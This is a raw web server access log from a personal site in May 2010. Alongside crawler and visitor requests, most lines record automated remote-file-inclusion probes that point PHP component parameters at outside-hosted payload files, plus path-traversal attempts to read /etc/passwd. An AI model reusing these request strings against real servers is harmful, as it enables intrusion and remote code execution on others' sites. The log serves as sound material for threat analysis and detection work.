205.56.129.195 - - [02/May/2010:06:56:17 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3"
205.56.129.195 - - [02/May/2010:06:57:36 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3"
87.250.255.243 - - [02/May/2010:06:58:48 -0500] "GET /logs/access_log.1269648000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
78.48.245.23 - - [02/May/2010:06:58:55 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; es-ES; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.0"
69.175.39.162 - - [02/May/2010:06:59:05 -0500] "GET /logs/access_log.1264032000//bbs///skin/zae_schedule/setup.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 345 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:06:59:05 -0500] "GET //bbs///skin/zae_schedule/setup.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 318 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:06:59:05 -0500] "GET /logs//bbs///skin/zae_schedule/setup.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 323 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:06:59:05 -0500] "GET /logs/access_log.1265932800//bbs///skin/zae_schedule/setup.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 345 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:06:59:38 -0500] "GET //bbs///skin/zae_schedule/setup.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 318 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:06:59:38 -0500] "GET /logs//bbs///skin/zae_schedule/setup.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 323 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:06:59:38 -0500] "GET /logs/access_log.1264032000//bbs///skin/zae_schedule/setup.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 345 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:06:59:38 -0500] "GET /logs/access_log.1265932800//bbs///skin/zae_schedule/setup.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 345 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:06:59:39 -0500] "GET /logs//bbs///skin/zae_schedule/setup.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 323 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:06:59:39 -0500] "GET /logs/access_log.1264032000//bbs///skin/zae_schedule/setup.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 345 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:06:59:39 -0500] "GET //bbs///skin/zae_schedule/setup.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 318 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:06:59:39 -0500] "GET /logs/access_log.1265932800//bbs///skin/zae_schedule/setup.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 345 "-""Mozilla/5.0"
67.195.112.180 - - [02/May/2010:06:59:51 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [02/May/2010:06:59:52 -0500] "GET /logs/access_log.1212019200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
69.175.39.162 - - [02/May/2010:07:01:00 -0500] "GET //bbs///skin/zae_schedule/setup.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 318 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:07:01:00 -0500] "GET /logs/access_log.1264032000//bbs///skin/zae_schedule/setup.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 345 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:07:01:00 -0500] "GET /logs/access_log.1265932800//bbs///skin/zae_schedule/setup.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 345 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:07:01:00 -0500] "GET /logs//bbs///skin/zae_schedule/setup.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 323 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:07:01:15 -0500] "GET /logs//bbs///skin/zae_schedule/setup.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 323 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:07:01:15 -0500] "GET /logs/access_log.1264032000//bbs///skin/zae_schedule/setup.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 345 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:07:01:15 -0500] "GET //bbs///skin/zae_schedule/setup.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 318 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:07:01:15 -0500] "GET /logs/access_log.1265932800//bbs///skin/zae_schedule/setup.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 345 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:07:01:33 -0500] "GET /logs//bbs///skin/zae_schedule/setup.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 323 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:07:01:33 -0500] "GET //bbs///skin/zae_schedule/setup.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 318 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:07:01:33 -0500] "GET /logs/access_log.1264032000//bbs///skin/zae_schedule/setup.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 345 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:07:01:33 -0500] "GET /logs/access_log.1265932800//bbs///skin/zae_schedule/setup.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 345 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:07:01:40 -0500] "GET /logs/access_log.1264032000//bbs///skin/zae_schedule/setup.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 345 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:07:01:40 -0500] "GET /logs//bbs///skin/zae_schedule/setup.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 323 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:07:01:40 -0500] "GET //bbs///skin/zae_schedule/setup.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 318 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:07:01:40 -0500] "GET /logs/access_log.1265932800//bbs///skin/zae_schedule/setup.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 345 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:07:01:57 -0500] "GET /logs//bbs///skin/zae_schedule/setup.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 323 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:07:01:57 -0500] "GET //bbs///skin/zae_schedule/setup.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 318 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:07:01:57 -0500] "GET /logs/access_log.1264032000//bbs///skin/zae_schedule/setup.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 345 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:07:01:57 -0500] "GET /logs/access_log.1265932800//bbs///skin/zae_schedule/setup.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 345 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:07:02:10 -0500] "GET //bbs///skin/zae_schedule/setup.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 318 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:07:02:10 -0500] "GET /logs//bbs///skin/zae_schedule/setup.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 323 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:07:02:10 -0500] "GET /logs/access_log.1264032000//bbs///skin/zae_schedule/setup.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 345 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:07:02:19 -0500] "GET /logs/access_log.1265932800//bbs///skin/zae_schedule/setup.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 345 "-""Mozilla/5.0"
62.140.247.10 - - [02/May/2010:07:03:44 -0500] "GET /logs/access_log.1264723200/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.sehoworld.com.tw/ind/uploads/id.gif? HTTP/1.1" 404 387 "-""Mozilla/5.0"
62.140.247.10 - - [02/May/2010:07:03:44 -0500] "GET /logs/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.sehoworld.com.tw/ind/uploads/id.gif? HTTP/1.1" 404 365 "-""Mozilla/5.0"
62.140.247.10 - - [02/May/2010:07:03:44 -0500] "GET /administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.sehoworld.com.tw/ind/uploads/id.gif? HTTP/1.1" 404 360 "-""Mozilla/5.0"
62.140.247.10 - - [02/May/2010:07:03:46 -0500] "GET /administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.sehoworld.com.tw/ind/uploads/id.gif? HTTP/1.1" 404 360 "-""Mozilla/5.0"
62.140.247.10 - - [02/May/2010:07:03:46 -0500] "GET /logs/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.sehoworld.com.tw/ind/uploads/id.gif? HTTP/1.1" 404 365 "-""Mozilla/5.0"
62.140.247.10 - - [02/May/2010:07:03:46 -0500] "GET /logs/access_log.1264723200/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.sehoworld.com.tw/ind/uploads/id.gif? HTTP/1.1" 404 387 "-""Mozilla/5.0"
62.140.247.10 - - [02/May/2010:07:03:46 -0500] "GET /logs/access_log.1265760000/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.sehoworld.com.tw/ind/uploads/id.gif? HTTP/1.1" 404 387 "-""Mozilla/5.0"
62.140.247.10 - - [02/May/2010:07:03:49 -0500] "GET /logs/access_log.1265760000/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.sehoworld.com.tw/ind/uploads/id.gif? HTTP/1.1" 404 387 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:07:03:55 -0500] "GET //bbs///skin/zae_schedule/setup.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 318 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:07:03:55 -0500] "GET /logs/access_log.1264032000//bbs///skin/zae_schedule/setup.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 345 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:07:03:55 -0500] "GET /logs//bbs///skin/zae_schedule/setup.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 323 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:07:04:14 -0500] "GET /logs/access_log.1265932800//bbs///skin/zae_schedule/setup.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 345 "-""Mozilla/5.0"
81.80.122.44 - - [02/May/2010:07:04:27 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
81.80.122.44 - - [02/May/2010:07:04:51 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
69.175.39.162 - - [02/May/2010:07:05:04 -0500] "GET /logs//bbs///skin/zae_schedule/setup.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 323 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:07:05:04 -0500] "GET //bbs///skin/zae_schedule/setup.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 318 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:07:05:04 -0500] "GET /logs/access_log.1264032000//bbs///skin/zae_schedule/setup.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 345 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:07:05:12 -0500] "GET /logs/access_log.1265932800//bbs///skin/zae_schedule/setup.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 345 "-""Mozilla/5.0"
81.80.122.44 - - [02/May/2010:07:05:23 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
81.80.122.44 - - [02/May/2010:07:05:31 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
69.175.39.162 - - [02/May/2010:07:05:34 -0500] "GET //bbs///skin/zae_schedule/setup.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 318 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:07:05:34 -0500] "GET /logs//bbs///skin/zae_schedule/setup.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 323 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:07:05:34 -0500] "GET /logs/access_log.1264032000//bbs///skin/zae_schedule/setup.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 345 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:07:05:35 -0500] "GET /logs/access_log.1265932800//bbs///skin/zae_schedule/setup.php?dir=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 345 "-""Mozilla/5.0"
207.46.13.140 - - [02/May/2010:07:10:24 -0500] "GET /logs/access_log.1157414400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
212.39.12.10 - - [02/May/2010:07:12:15 -0500] "GET /logs//index.php?include_file=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.65"
212.39.12.10 - - [02/May/2010:07:12:15 -0500] "GET //index.php?include_file=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
212.39.12.10 - - [02/May/2010:07:21:50 -0500] "GET //index.php?include_file=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
81.80.122.44 - - [02/May/2010:07:23:15 -0500] "GET /logs/access_log.1270598400/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 345 "-""libwww-perl/5.805"
81.80.122.44 - - [02/May/2010:07:23:15 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
81.80.122.44 - - [02/May/2010:07:23:16 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
87.250.255.243 - - [02/May/2010:07:23:43 -0500] "GET /logs/access_log.1271894400 HTTP/1.1" 200 656203 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.195.112.180 - - [02/May/2010:07:28:39 -0500] "GET /logs/access_log.1233619200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [02/May/2010:07:40:03 -0500] "GET /artwork/flagart.htm HTTP/1.1" 200 923 "-""Yandex/1.01.001 (compatible; Win16; I)"
81.80.122.44 - - [02/May/2010:07:40:34 -0500] "GET /logs/access_log.1217376000/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 345 "-""libwww-perl/5.805"
81.80.122.44 - - [02/May/2010:07:42:56 -0500] "GET /logs/access_log.1270598400/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 345 "-""libwww-perl/5.805"
81.80.122.44 - - [02/May/2010:07:42:56 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
81.80.122.44 - - [02/May/2010:07:42:56 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
78.110.50.139 - - [02/May/2010:07:43:58 -0500] "GET /logs////?_PHPLIB[libdir]=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 200 4000 "-""Mozilla/5.0"
78.110.50.139 - - [02/May/2010:07:43:59 -0500] "GET ////?_PHPLIB[libdir]=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 200 1005 "-""Mozilla/5.0"
78.110.50.139 - - [02/May/2010:07:43:59 -0500] "GET /logs/access_log.1262649600////?_PHPLIB[libdir]=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
78.110.50.139 - - [02/May/2010:07:44:02 -0500] "GET /logs/access_log.1262649600////?_PHPLIB[libdir]=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
78.110.50.139 - - [02/May/2010:07:44:02 -0500] "GET /logs////?_PHPLIB[libdir]=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 200 4000 "-""Mozilla/5.0"
78.110.50.139 - - [02/May/2010:07:44:02 -0500] "GET ////?_PHPLIB[libdir]=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 200 1005 "-""Mozilla/5.0"
212.241.177.123 - - [02/May/2010:07:45:12 -0500] "GET /index2.php?x=http://www.boomong.com/bbs//data/1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
212.241.177.123 - - [02/May/2010:07:45:12 -0500] "GET /logs/access_log.1225238400/index2.php?x=http://www.boomong.com/bbs//data/1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
212.241.177.123 - - [02/May/2010:07:45:12 -0500] "GET /logs/index2.php?x=http://www.boomong.com/bbs//data/1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
212.241.177.123 - - [02/May/2010:07:45:12 -0500] "GET /logs/access_log.1263686400/index2.php?x=http://www.boomong.com/bbs//data/1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:07:45:16 -0500] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 294 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:07:45:16 -0500] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 299 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:07:45:16 -0500] "GET /logs/access_log.1268956800%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 323 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:07:45:48 -0500] "GET /logs/access_log.1268956800%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 323 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:07:45:48 -0500] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 294 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:07:45:48 -0500] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 299 "-""Mozilla/5.0"
212.39.12.10 - - [02/May/2010:07:46:24 -0500] "GET /logs/access_log.1270512000//index.php?include_file=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""libwww-perl/5.65"
212.39.12.10 - - [02/May/2010:07:46:24 -0500] "GET //index.php?include_file=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
212.39.12.10 - - [02/May/2010:07:46:24 -0500] "GET /logs//index.php?include_file=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.65"
202.72.242.242 - - [02/May/2010:07:49:34 -0500] "GET /logs/access_log.1270684800%20%20//mambots/content/multithumb/errors.php?error=http://golfblaster3d.ru/includes/id1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
202.72.242.242 - - [02/May/2010:07:49:34 -0500] "GET //mambots/content/multithumb/errors.php?error=http://golfblaster3d.ru/includes/id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
202.72.242.242 - - [02/May/2010:07:49:34 -0500] "GET /logs//mambots/content/multithumb/errors.php?error=http://golfblaster3d.ru/includes/id1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:07:51:49 -0500] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 294 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:07:51:49 -0500] "GET /logs/access_log.1268956800%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 323 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:07:51:49 -0500] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 299 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:07:52:09 -0500] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 294 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:07:52:12 -0500] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 299 "-""Mozilla/5.0"
69.175.39.162 - - [02/May/2010:07:52:12 -0500] "GET /logs/access_log.1268956800%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.formationalliance.com/images/id1.txt???? HTTP/1.1" 404 323 "-""Mozilla/5.0"
99.39.2.249 - - [02/May/2010:07:53:53 -0500] "GET /logs/access_log.1270857600//htmltonuke.php?filnavn=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 326 "-""libwww-perl/5.834"
99.39.2.249 - - [02/May/2010:07:53:53 -0500] "GET //htmltonuke.php?filnavn=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
99.39.2.249 - - [02/May/2010:07:53:54 -0500] "GET /logs//htmltonuke.php?filnavn=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 304 "-""libwww-perl/5.834"
121.190.102.21 - - [02/May/2010:07:55:28 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
121.190.102.21 - - [02/May/2010:07:55:28 -0500] "GET /logs/access_log.1270598400%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
121.190.102.21 - - [02/May/2010:07:55:28 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
87.250.255.243 - - [02/May/2010:07:55:41 -0500] "GET /logs/access_log.1251676800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
114.108.151.149 - - [02/May/2010:08:00:25 -0500] "GET //load_lang.php?_SERWEB[serwebdir]=http://www.howtolisten.kr//parti/data/admin/id1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
114.108.151.149 - - [02/May/2010:08:00:25 -0500] "GET /logs//load_lang.php?_SERWEB[serwebdir]=http://www.howtolisten.kr//parti/data/admin/id1.txt??? HTTP/1.1" 404 303 "-""Mozilla/5.0"
114.108.151.149 - - [02/May/2010:08:00:29 -0500] "GET /logs/access_log.1266019200//load_lang.php?_SERWEB[serwebdir]=http://www.howtolisten.kr//parti/data/admin/id1.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
114.108.151.149 - - [02/May/2010:08:00:29 -0500] "GET /logs/access_log.1264204800//load_lang.php?_SERWEB[serwebdir]=http://www.howtolisten.kr//parti/data/admin/id1.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
121.190.102.21 - - [02/May/2010:08:03:44 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
121.190.102.21 - - [02/May/2010:08:03:44 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
121.190.102.21 - - [02/May/2010:08:03:44 -0500] "GET /logs/access_log.1270598400%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
81.80.122.44 - - [02/May/2010:08:04:24 -0500] "GET /logs/access_log.1232668800/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 345 "-""libwww-perl/5.805"
207.46.199.193 - - [02/May/2010:08:05:08 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
114.108.151.149 - - [02/May/2010:08:05:10 -0500] "GET //load_lang.php?_SERWEB[serwebdir]=http://www.howtolisten.kr//parti/data/admin/id1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
114.108.151.149 - - [02/May/2010:08:05:11 -0500] "GET /logs//load_lang.php?_SERWEB[serwebdir]=http://www.howtolisten.kr//parti/data/admin/id1.txt??? HTTP/1.1" 404 303 "-""Mozilla/5.0"
114.108.151.149 - - [02/May/2010:08:05:16 -0500] "GET /logs/access_log.1264204800//load_lang.php?_SERWEB[serwebdir]=http://www.howtolisten.kr//parti/data/admin/id1.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
114.108.151.149 - - [02/May/2010:08:05:16 -0500] "GET /logs/access_log.1266019200//load_lang.php?_SERWEB[serwebdir]=http://www.howtolisten.kr//parti/data/admin/id1.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
207.46.195.227 - - [02/May/2010:08:06:54 -0500] "GET /logs/access_log.1206835200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [02/May/2010:08:11:00 -0500] "GET /logs/access_log.1211587200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.235.124.132 - - [02/May/2010:08:12:06 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko GranParadiso/3.0.11"
